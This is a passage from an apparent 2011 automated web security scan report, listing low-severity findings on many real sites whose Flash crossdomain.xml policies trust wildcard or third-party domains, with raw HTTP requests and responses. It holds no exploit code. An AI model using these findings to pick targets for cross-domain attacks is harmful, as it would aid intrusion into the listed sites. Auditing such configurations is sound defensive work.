Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.livewellhd.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Connection: close
Date: Wed, 04 May 2011 01:42:29 GMT
Content-Length: 1920
Content-Type: text/xml
Last-Modified: Wed, 23 Feb 2011 18:44:45 GMT
Accept-Ranges: bytes
ETag: "804c4bbd89d3cb1:1e1c"
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abclow04
X-Powered-By: ASP.NET
Cache-Expires: Tue, 03 May 2011 17:58:22 GMT

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-dom
...[SNIP]...
<allow-access-from domain="*.abcnews.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.go.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.abc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.dig.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.starwave.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.corp.dig.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.corp.dig.com:8210" secure="false" />
...[SNIP]...
<allow-access-from domain="*.abclocal.go.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.livewellhd.com" secure="false" />
...[SNIP]...
<allow-access-from domain="livewellhd.com" secure="false" />
...[SNIP]...
<allow-access-from domain="livewellnetwork.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.livewellnetwork.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.7liveonline.com" secure="false" />
...[SNIP]...
<allow-access-from domain="7liveonline.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.ontheredcarpet.com" secure="false" />
...[SNIP]...
<allow-access-from domain="ontheredcarpet.com" secure="false" />
...[SNIP]...
<allow-access-from domain="speed.pointroll.com"/>
<allow-access-from domain="data.pointroll.com"/>
<allow-access-from domain="media.pointroll.com"/>
<allow-access-from domain="mirror.pointroll.com"/>
<allow-access-from domain="pointroll.com"/>
<allow-access-from domain="www.pointroll.com"/>
<allow-access-from domain="ehg-dig.hitbox.com"/>
<allow-access-from domain="*.hitbox.com"/>
<allow-access-from domain="adsfac.us" />
<allow-access-from domain="68.71.208.35" />
<allow-access-from domain="68.71.209.162" />
...[SNIP]...

7.273. http://www.majman.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.majman.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.majman.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:41:04 GMT
Server: Apache
Last-Modified: Mon, 07 Aug 2006 03:30:12 GMT
ETag: "16661152-1dc-41a6518817900"
Accept-Ranges: bytes
Content-Length: 476
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="http://www.majman.com" />

...[SNIP]...
<allow-access-from domain="http://majman.com" />
<allow-access-from domain="http://www.majman.net" />
<allow-access-from domain="http://majman.net" />
<allow-access-from domain="*.majman.com" />
<allow-access-from domain="*.majman.net" />
...[SNIP]...

7.274. http://www.marisamiller.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.marisamiller.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.marisamiller.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:06:35 GMT
Server: Apache/2.0.54
Last-Modified: Tue, 05 May 2009 22:11:43 GMT
Accept-Ranges: bytes
Content-Length: 223
Vary: User-Agent
X-Powered-By: W3 Total Cache/0.9.1.3
Connection: close
Content-Type: application/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy> <allow-access-from domain="*.methodsofmadness.com" />
...[SNIP]...

7.275. http://www.mctennessee.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.mctennessee.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mctennessee.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:09:49 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Mon, 05 Jan 2009 12:51:40 GMT
ETag: "a98fe-193-c0804f00"
Accept-Ranges: bytes
Content-Length: 403
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml
Set-Cookie: BIGipServerPOOL_74.205.90.114=1879156928.20480.0000; path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.mcstate.com" />
   <allow-access-from domain="staging.mcstate.com" />
   <allow-access-from domain="www.mcstate.com" />
   <allow-access-from domain="www.mctexas.com" />
   <allow-access-from domain="mctexas.com" />
...[SNIP]...

7.276. http://www.mediav.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.mediav.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mediav.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:56:24 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 15 Apr 2011 06:33:36 GMT
ETag: "3e1ae-b1-4a0ef38b73000"
Accept-Ranges: bytes
Content-Length: 177
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8"?>
<cross-domain-policy>
<allow-access-from domain="*.mediav.com" />
<allow-access-from domain="mediav.com" />
</cross-domain-policy>

7.277. http://www.meendo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.meendo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.meendo.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 04 May 2011 02:00:07 GMT
Content-Type: application/xml
Connection: close
Last-Modified: Thu, 05 Nov 2009 18:51:05 GMT
ETag: "20afa8-c5-4af31e99"
Accept-Ranges: bytes
Content-Length: 197

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.meendo.com" />
<allow-access-from domain="*.meendo.ru" />
<allow-access-from domain="*.yoummy.com" />
</cross-domain-policy>

7.278. http://www.misquincemag.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.misquincemag.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.misquincemag.com

Response

HTTP/1.0 200 OK
Server: Apache
Content-Length: 2016
Content-Type: application/xml
Cache-Control: max-age=600
Date: Wed, 04 May 2011 03:06:39 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.syrupnyc.org"/>
   <allow-access-from domain="*.esquire.com"/>
   <allow-access-from domain="*.cosmogirl.com"/>
   <allow-access-from domain="*.cosmopolitan.com"/>
   <allow-access-from domain="*.countryliving.com"/>
   <allow-access-from domain="*.goodhousekeeping.com"/>
   <allow-access-from domain="*.harpersbazaar.com"/>
   <allow-access-from domain="*.housebeautiful.com"/>
   <allow-access-from domain="*.marieclaire.com"/>
   <allow-access-from domain="*.misquincemag.com"/>
   <allow-access-from domain="*.popularmechanics.com"/>
   <allow-access-from domain="*.quickandsimple.com"/>
   <allow-access-from domain="*.redbookmag.com"/>
   <allow-access-from domain="*.seventeen.com"/>
   <allow-access-from domain="*.teenmag.com"/>
   <allow-access-from domain="*.thedailygreen.com"/>
   <allow-access-from domain="*.veranda.com"/>
   <allow-access-from domain="*.townandcountrymag.com"/>
   <allow-access-from domain="*.townandcountrytravelmag.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.hearstmags.com"/>
   <allow-access-from domain="*.realage.com"/>
   <allow-access-from domain="*.realbeauty.com"/>
<allow-access-from domain="*.mstudio.com"/>
   <allow-access-from domain="*.cooliris.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.thesurvivorsclub.org" secure="false" />
...[SNIP]...
<allow-access-from domain="*.googlesyndication.com" />
   <allow-access-from domain="*.doubleclick.net"/>
   <allow-access-from domain="*.harpersbazaar.co.uk"/>
   <allow-access-from domain="*.company.co.uk"/>
   <allow-access-from domain="*.youandyourwedding.co.uk"/>
   <allow-access-from domain="*.menshealth.co.uk"/>
   <allow-access-from domain="*.babyexpert.com"/>
   <allow-access-from domain="*.handbag.com"/>
   <allow-access-from domain="*.cosmopolitan.co.uk"/>
...[SNIP]...

7.279. http://www.mkt1444.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.mkt1444.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mkt1444.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:50:49 GMT
Server: Apache
Last-Modified: Mon, 16 Aug 2010 18:37:10 GMT
ETag: "1cdc-ce0-48df51ecb8180"
Accept-Ranges: bytes
Content-Length: 3296
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="iso-8859-1"?>
<!-- Cross Domain File Flash data connections to Silverpop.
SUBVERSIONED
-->
<cross-domain-policy>
<site-control permitted-cross-domain-policies="m
...[SNIP]...
<allow-access-from domain="cisco.com" />
<allow-access-from domain="*.cisco.com" />
<allow-access-from domain="enjoyuserexperience.com" />
<allow-access-from domain="*.enjoyuserexperience.com" />
<allow-access-from domain="smileassessment.vmlapps.com" />
<allow-access-from domain="invisalign.com" />
<allow-access-from domain="winstage.vml.com" />
<allow-access-from domain="resp.survey01.net" />
<allow-access-from domain="www.atptennis.com" />
<allow-access-from domain="www.atptennis.atponline.net" />
<allow-access-from domain="vml.com"/>
<allow-access-from domain="*.vml.com"/>
<allow-access-from domain="vmlapps.com"/>
<allow-access-from domain="*.vmlapps.com"/>
<allow-access-from domain="*.invisalign.com"/>
<allow-access-from domain="publishinvisalign"/>
<allow-access-from domain="www.atpworldtour.com"/>
<allow-access-from domain="your-majesty.com"/>
<allow-access-from domain="*.your-majesty.com"/>
<allow-access-from domain="sethfloydjr.com"/>
<allow-access-from domain="*.content.ogilvy.edgesuite.net"/>
...[SNIP]...
<allow-access-from domain="*.2mdn.net" />
...[SNIP]...
<allow-access-from domain="*.dartmotif.net" />
...[SNIP]...
<allow-access-from domain="*.doubleclick.net" />
...[SNIP]...
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...
<allow-access-from domain="*.googlesyndication.com" />
...[SNIP]...
<allow-access-from domain="*.gstatic.com" />
...[SNIP]...
<allow-access-from domain="*.scholieren.tv"/>
...[SNIP]...
<allow-access-from domain="*.yourfuture.tv"/>
...[SNIP]...

7.280. http://www.mkt746.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.mkt746.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mkt746.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:23:08 GMT
Server: Apache
Last-Modified: Fri, 20 Mar 2009 17:23:02 GMT
ETag: "1d35-2f3-465902b3da980"
Accept-Ranges: bytes
Content-Length: 755
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="iso-8859-1"?>
<!--
Cross Domain File Flash data connections to SilverPop.

-->
<cross-domain-policy>
<allow-access-from domain="pink.ugenmedia.com" />
<allow-access-from domain="pinkassets.ugenmedia.com" />
<allow-access-from domain="bettycrocker.com" />
<allow-access-from domain="www.bettycrocker.com" />
<allow-access-from domain="generalmills.com" />
<allow-access-from domain="www.generalmills.com" />
<allow-access-from domain="jam3media.com" />
<allow-access-from domain="www.jam3media.com" />
<allow-access-from domain="*.dinnermadeeasy.com" />
<allow-access-from domain="*.dinnermadeeasylistening.com"/>
...[SNIP]...

7.281. http://www.mnsun.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.mnsun.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mnsun.com

Response

HTTP/1.0 200 OK
Server: WWW
Content-Type: application/xml
Date: Wed, 04 May 2011 02:16:00 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
ETag: "1593037"
Connection: close
Last-Modified: Wed, 20 Jan 2010 16:54:45 GMT
X-Cache-Info: caching
Real-Hostname: mnsun.com
Content-Length: 127

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*.mytiwi.com" to-ports="*" />
</cross-domain-policy>

7.282. http://www.mtv.ca/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.mtv.ca
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mtv.ca

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Last-Modified: Wed, 02 Dec 2009 20:09:42 GMT
ETag: "41edf30-343-479c47480ed80"
Accept-Ranges: bytes
Content-Length: 835
Content-Type: application/xml
Cache-Control: max-age=600
Date: Wed, 04 May 2011 03:27:55 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.mtv.com" />
   <allow-access-from domain="*.mtvi.com" />
   <allow-access-from domain="*.schematic.com" />
   <allow-access-from domain="*.mtv.ca" />
   <allow-access-from domain="*.mtvhive.ca" />
   <allow-access-from domain="*.datemyplaylist.ca" />
   <allow-access-from domain="*.datemyplaylist.com" />
   <allow-access-from domain="166.77.9.69" />
   <allow-access-from domain="*.doubleclick.net" />
   <allow-access-from domain="m1.2mdn.net" />
   <allow-access-from domain="*.coorslight.ca" />
<allow-access-from domain="*.muchmtv.ca" />
   <allow-access-from domain="*.muchmusic.com" />
   <allow-access-from domain="*.2mdn.net" />
...[SNIP]...

7.283. http://www.musclemustangfastfords.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.musclemustangfastfords.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.musclemustangfastfords.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 01:39:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=e2nrxhyj4gzza555std3sd55; path=/; HttpOnly
Set-Cookie: UserPuid=2336862965438771749; domain=musclemustangfastfords.com; expires=Wed, 04-May-2061 01:39:01 GMT; path=/
Cache-Control: private
Content-Type: text/xml
Content-Length: 3634

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*.4wdandsportutility.com" />
<allow-access-from domain="*.4wheeloffroad.com" />
<allow-access-from domain="*.4wdandsportutility.com" />
<allow-access-from domain="*.atvrideronline.com" />
<allow-access-from domain="*.autobuyguide.com" />
<allow-access-from domain="*.automobilemag.com" />
<allow-access-from domain="*.automotive.com" />
<allow-access-from domain="*.camaroperformers.com" />
<allow-access-from domain="*.caraudiomag.com" />
<allow-access-from domain="*.carcraft.com" />
<allow-access-from domain="*.chevyhiperformance.com" />
<allow-access-from domain="*.circletrack.com" />
<allow-access-from domain="*.classictrucks.com" />
<allow-access-from domain="*.corvettefever.com" />
<allow-access-from domain="*.customclassictrucks.com" />
<allow-access-from domain="*.customrodder.com" />
<allow-access-from domain="*.dieselpowermag.com" />
<allow-access-from domain="*.dirtrider.com" />
<allow-access-from domain="*.europeancarweb.com" />
<allow-access-from domain="*.eurotuner.com" />
<allow-access-from domain="*.fourwheeler.com" />
<allow-access-from domain="*.gmhightechperformance.com" />
<allow-access-from domain="*.highperformancepontiac.com" />
<allow-access-from domain="*.hondatuningmagazine.com" />
<allow-access-from domain="*.hotbikeweb.com" />
<allow-access-from domain="*.hotrod.com" />
<allow-access-from domain="*.hotrodsbikeworks.com" />
<allow-access-from domain="*.importtuner.com" />
<allow-access-from domain="*.intellichoice.com" />
<allow-access-from domain="*.internetautoguide.com" />
<allow-access-from domain="*.jpmagazine.com" />
<allow-access-from domain="*.kitcarmag.com" />
<allow-access-from domain="*.lowridermagazine.com" />
<allow-access-from domain="*.minitruckinweb.com" />
<allow-access-from domain="*.modified.com" />
<allow-access-from domain="*.modifiedmustangs.com" />
<allow-access-from domain="*.moparmusclemagazine.com" />
<allow-access-from domain="*.motorcyclecruiser.com" />
<allow-access-from domain="*.motorcyclistonline.com" />
<allow-access-from domain="*.motortrend.com" />
<allow-access-from domain="*.motortrendenespanol.com" />
<allow-access-from domain="*.musclemustangfastfords.com" />
<allow-access-from domain="*.mustang50magazine.com" />
<allow-access-from domain="*.mustangandfords.com" />
<allow-access-from domain="*.mustangmonthly.com" />
<allow-access-from domain="*.newcar.com" />
<allow-access-from domain="*.off-roadweb.com" />
<allow-access-from domain="*.popularhotrodding.com" />
<allow-access-from domain="*.rodandcustommagazine.com" />
<allow-access-from domain="*.sportcompactcarweb.com" />
<allow-access-from domain="*.sportrider.com" />
<allow-access-from domain="*.sporttruck.com" />
<allow-access-from domain="*.stockcarracing.com" />
<allow-access-from domain="*.streetchopperweb.com" />
<allow-access-from domain="*.superchevy.com" />
<allow-access-from domain="*.superstreetbike.com" />
<allow-access-from domain="*.superstreetonline.com" />
<allow-access-from domain="*.truckinssuv.com" />
<allow-access-from domain="*.truckinweb.com" />
<allow-access-from domain="*.trucktrend.com" />
<allow-access-from domain="*.turbomag.com" />
<allow-access-from domain="*.turbomagazine.com" />
<allow-access-from domain="*.vetteweb.com" />
<allow-access-from domain="*.vwtrendsweb.com" />
...[SNIP]...

7.284. http://www.mustang50magazine.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.mustang50magazine.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mustang50magazine.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 03:17:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=of15abehx4aepw55q0sunyzj; path=/; HttpOnly
Set-Cookie: UserPuid=2346883152160655265; domain=mustang50magazine.com; expires=Wed, 04-May-2061 03:17:30 GMT; path=/
Cache-Control: private
Content-Type: text/xml
Content-Length: 3634

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*.4wdandsportutility.com" />
<allow-access-from domain="*.4wheeloffroad.com" />
<allow-access-from domain="*.4wdandsportutility.com" />
<allow-access-from domain="*.atvrideronline.com" />
<allow-access-from domain="*.autobuyguide.com" />
<allow-access-from domain="*.automobilemag.com" />
<allow-access-from domain="*.automotive.com" />
<allow-access-from domain="*.camaroperformers.com" />
<allow-access-from domain="*.caraudiomag.com" />
<allow-access-from domain="*.carcraft.com" />
<allow-access-from domain="*.chevyhiperformance.com" />
<allow-access-from domain="*.circletrack.com" />
<allow-access-from domain="*.classictrucks.com" />
<allow-access-from domain="*.corvettefever.com" />
<allow-access-from domain="*.customclassictrucks.com" />
<allow-access-from domain="*.customrodder.com" />
<allow-access-from domain="*.dieselpowermag.com" />
<allow-access-from domain="*.dirtrider.com" />
<allow-access-from domain="*.europeancarweb.com" />
<allow-access-from domain="*.eurotuner.com" />
<allow-access-from domain="*.fourwheeler.com" />
<allow-access-from domain="*.gmhightechperformance.com" />
<allow-access-from domain="*.highperformancepontiac.com" />
<allow-access-from domain="*.hondatuningmagazine.com" />
<allow-access-from domain="*.hotbikeweb.com" />
<allow-access-from domain="*.hotrod.com" />
<allow-access-from domain="*.hotrodsbikeworks.com" />
<allow-access-from domain="*.importtuner.com" />
<allow-access-from domain="*.intellichoice.com" />
<allow-access-from domain="*.internetautoguide.com" />
<allow-access-from domain="*.jpmagazine.com" />
<allow-access-from domain="*.kitcarmag.com" />
<allow-access-from domain="*.lowridermagazine.com" />
<allow-access-from domain="*.minitruckinweb.com" />
<allow-access-from domain="*.modified.com" />
<allow-access-from domain="*.modifiedmustangs.com" />
<allow-access-from domain="*.moparmusclemagazine.com" />
<allow-access-from domain="*.motorcyclecruiser.com" />
<allow-access-from domain="*.motorcyclistonline.com" />
<allow-access-from domain="*.motortrend.com" />
<allow-access-from domain="*.motortrendenespanol.com" />
<allow-access-from domain="*.musclemustangfastfords.com" />
<allow-access-from domain="*.mustang50magazine.com" />
<allow-access-from domain="*.mustangandfords.com" />
<allow-access-from domain="*.mustangmonthly.com" />
<allow-access-from domain="*.newcar.com" />
<allow-access-from domain="*.off-roadweb.com" />
<allow-access-from domain="*.popularhotrodding.com" />
<allow-access-from domain="*.rodandcustommagazine.com" />
<allow-access-from domain="*.sportcompactcarweb.com" />
<allow-access-from domain="*.sportrider.com" />
<allow-access-from domain="*.sporttruck.com" />
<allow-access-from domain="*.stockcarracing.com" />
<allow-access-from domain="*.streetchopperweb.com" />
<allow-access-from domain="*.superchevy.com" />
<allow-access-from domain="*.superstreetbike.com" />
<allow-access-from domain="*.superstreetonline.com" />
<allow-access-from domain="*.truckinssuv.com" />
<allow-access-from domain="*.truckinweb.com" />
<allow-access-from domain="*.trucktrend.com" />
<allow-access-from domain="*.turbomag.com" />
<allow-access-from domain="*.turbomagazine.com" />
<allow-access-from domain="*.vetteweb.com" />
<allow-access-from domain="*.vwtrendsweb.com" />
...[SNIP]...

7.285. http://www.mustsharejokes.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.mustsharejokes.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mustsharejokes.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:53:42 GMT
Server: Apache
Last-Modified: Fri, 29 Apr 2011 19:37:00 GMT
Accept-Ranges: bytes
Content-Length: 411
Cache-Control: max-age=2592000
Expires: Fri, 03 Jun 2011 02:53:42 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.dell.com" />
   <allow-access-from domain="*.marketingadvocate.com" />
   <allow-access-from domain="*.wetpaint.com" />
   <allow-access-from domain="*.wetpaint.net" />
<allow-access-from domain="*.wetpaint.me" />
...[SNIP]...

7.286. http://www.muvids.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.muvids.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.muvids.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:08:12 GMT
Server: Apache
Last-Modified: Wed, 18 Nov 2009 01:54:29 GMT
ETag: "1201de7-94-4789b85ecdf40"
Accept-Ranges: bytes
Content-Length: 148
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<cross-domain-policy>
<allow-access-from domain="*.brightcove.com"/>
<allow-access-from domain="*.googlesyndication.com"/>
</cross-domain-policy>

7.287. http://www.myweather.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.myweather.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.myweather.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Wed, 04 May 2011 01:31:56 GMT
Content-Type: text/xml; charset=utf-8
Connection: close
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 217
X-PageAssembler: Build 4.9.000;cc:
servername: www11

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
